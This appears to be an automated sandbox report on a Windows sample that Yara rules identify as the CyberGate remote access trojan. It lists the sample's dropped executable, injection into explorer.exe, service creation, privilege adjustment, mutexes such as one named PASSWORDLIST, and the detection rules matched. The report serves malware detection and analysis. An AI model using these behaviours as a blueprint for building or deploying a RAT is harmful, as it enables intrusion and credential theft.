            Source: Yara matchFile source: 00000009.00000002.554462336.0000000000401000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: TEXTURAFIVEM.exe PID: 5432, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: TEXTURAFIVEM.exe PID: 4024, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: TEXTURAFIVEM.exe PID: 6984, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dqH3t8JU1x.exe PID: 6776, type: MEMORY
            Source: Yara matchFile source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects CyberGate RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects CyberGate RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects CyberGate RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects CyberGate RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects CyberGate RAT Author: Kevin Breen <kevin@techanarchy.net>
            Source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate Author: Kevin Breen <kevin@techanarchy.net>
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24015C1C OpenProcess,NtQueryInformationProcess,NtSetInformationProcess,CloseHandle,FindCloseChangeNotification,20_2_24015C1C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403B690 NtdllDefWindowProc_A,20_2_2403B690
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403EAA0 SetPropA,GetPropA,NtdllDefWindowProc_A,20_2_2403EAA0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403C950 OpenSCManagerA,OpenServiceA,DeleteService,CloseServiceHandle,CloseServiceHandle,20_2_2403C950
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2401528E ExitWindowsEx,20_2_2401528E
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeFile created: C:\Windows\install\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2405618820_2_24056188
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2402F41420_2_2402F414
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_240334CC20_2_240334CC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24035C2420_2_24035C24
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2402FD4420_2_2402FD44
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403597020_2_24035970
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 24013480 appears 140 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 24015008 appears 56 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 240130DC appears 64 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 24013388 appears 37 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 2402562C appears 392 times
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: String function: 00401AE4 appears 37 times
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: String function: 00403610 appears 38 times
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: String function: 00401E10 appears 60 times
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: String function: 00401AC0 appears 81 times
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: String function: 00403630 appears 33 times
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: String function: 00401B58 appears 39 times
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: String function: 00401898 appears 33 times
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: String function: 00401AE4 appears 111 times
            Source: C:\Windows\install\TEXTURAFIVEM.exeCode function: String function: 00403610 appears 114 times
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 620
            Source: dqH3t8JU1x.exeStatic PE information: Resource name: RT_ICON type: SVR2 pure executable (Amdahl-UTS) not stripped - version 428919424
            Source: TEXTURAFIVEM.exe.1.drStatic PE information: Resource name: RT_ICON type: SVR2 pure executable (Amdahl-UTS) not stripped - version 428919424
            Source: dqH3t8JU1x.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
            Source: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, type: MEMORYMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 00000015.00000002.628676656.0000000024080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 0000001E.00000002.630169861.0000000024010000.00000040.00000001.sdmp, type: MEMORYMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 00000016.00000002.628591472.0000000024010000.00000040.00000001.sdmp, type: MEMORYMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.2.explorer.exe.24010000.6.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_CyberGate date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects CyberGate RAT, reference = http://malwareconfig.com/stats/CyberGate
            Source: 25.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/CyberGate
            Source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_CyberGate date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects CyberGate RAT, reference = http://malwareconfig.com/stats/CyberGate
            Source: 1.2.dqH3t8JU1x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/CyberGate
            Source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_CyberGate date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects CyberGate RAT, reference = http://malwareconfig.com/stats/CyberGate
            Source: 4.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/CyberGate
            Source: 30.2.explorer.exe.24010000.3.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.2.explorer.exe.24010000.6.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_CyberGate date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects CyberGate RAT, reference = http://malwareconfig.com/stats/CyberGate
            Source: 5.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/CyberGate
            Source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_CyberGate date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects CyberGate RAT, reference = http://malwareconfig.com/stats/CyberGate
            Source: 9.2.TEXTURAFIVEM.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: CyberGate date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/CyberGate
            Source: 22.2.explorer.exe.24010000.3.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.2.explorer.exe.24080000.3.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.2.explorer.exe.24080000.3.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 22.2.explorer.exe.24010000.3.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 30.2.explorer.exe.24010000.3.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/24@4/0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_24015B30 GetVersionExA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,20_2_24015B30
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403C424 GetVersionExA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,CloseHandle,20_2_2403C424
            Source: C:\Windows\SysWOW64\explorer.exeCode function: OpenSCManagerA,CreateServiceA,CloseServiceHandle,CloseServiceHandle,20_2_2403CBE4
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeCode function: 1_2_00404460 FindResourceA,SizeofResource,LoadResource,LockResource,FreeResource,1_2_00404460
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_2403C858 OpenSCManagerA,OpenServiceA,StartServiceA,ControlService,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,20_2_2403C858
            Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Roaming\logs.datJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMutant created: \Sessions\1\BaseNamedObjects\_x_X_UPDATE_X_x_
            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\***MUTEX***
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4908
            Source: C:\Windows\install\TEXTURAFIVEM.exeMutant created: \Sessions\1\BaseNamedObjects\_x_X_BLOCKMOUSE_X_x_
            Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\_x_X_PASSWORDLIST_X_x_
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1768
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5908
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5432
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeFile created: C:\Users\user\AppData\Local\Temp\XX--XX--XX.txtJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: dqH3t8JU1x.exeVirustotal: Detection: 90%
            Source: dqH3t8JU1x.exeReversingLabs: Detection: 100%
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeFile read: C:\Users\user\Desktop\dqH3t8JU1x.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\dqH3t8JU1x.exe 'C:\Users\user\Desktop\dqH3t8JU1x.exe'
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe'
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe'
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe'
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exe
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exe
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exe
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe'
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5432 -s 620
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exe
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 1104
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1768 -s 1104
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 1112
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe' Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe' Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe' Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeProcess created: C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\install\TEXTURAFIVEM.exe 'C:\Windows\install\TEXTURAFIVEM.exe' Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Binary string: msacm32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: RmClient.pdb= source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: msvfw32.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001C.00000003.530664291.0000000004FCE000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.553818944.0000000000BCA000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: pstorec.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001C.00000003.530712712.00000000031F1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: SettingSyncCore.pdbd source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.572208737.0000000004F51000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: rasapi32.pdbhr source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000001C.00000003.540602440.00000000052C1000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.555588364.00000000056E0000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.572284230.0000000005060000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587851693.0000000003400000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000001C.00000003.540720006.00000000053E7000.00000004.00000040.sdmp, WerFault.exe, 0000001F.00000003.555539796.0000000005711000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587755590.00000000055F1000.00000004.00000001.sdmp
            Source: Binary string: mpr.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: wuser32.pdbe source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: avicap32.pdbq source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdb{ source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp, WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.587540845.0000000003409000.00000004.00000040.sdmp
            Source: Binary string: ntmarta.pdbc source: WerFault.exe, 0000001F.00000003.555268949.00000000056E9000.00000004.00000040.sdmp
            Source: Binary string: shell32.pdbp source: WerFault.exe, 00000023.00000003.571867465.0000000005069000.00000004.00000040.sdmp
            Source: Binary string: ole32.pdbk source: WerFault.exe, 0000001C.00000003.540622242.00000000053E1000.00000004.00000040.sdmp
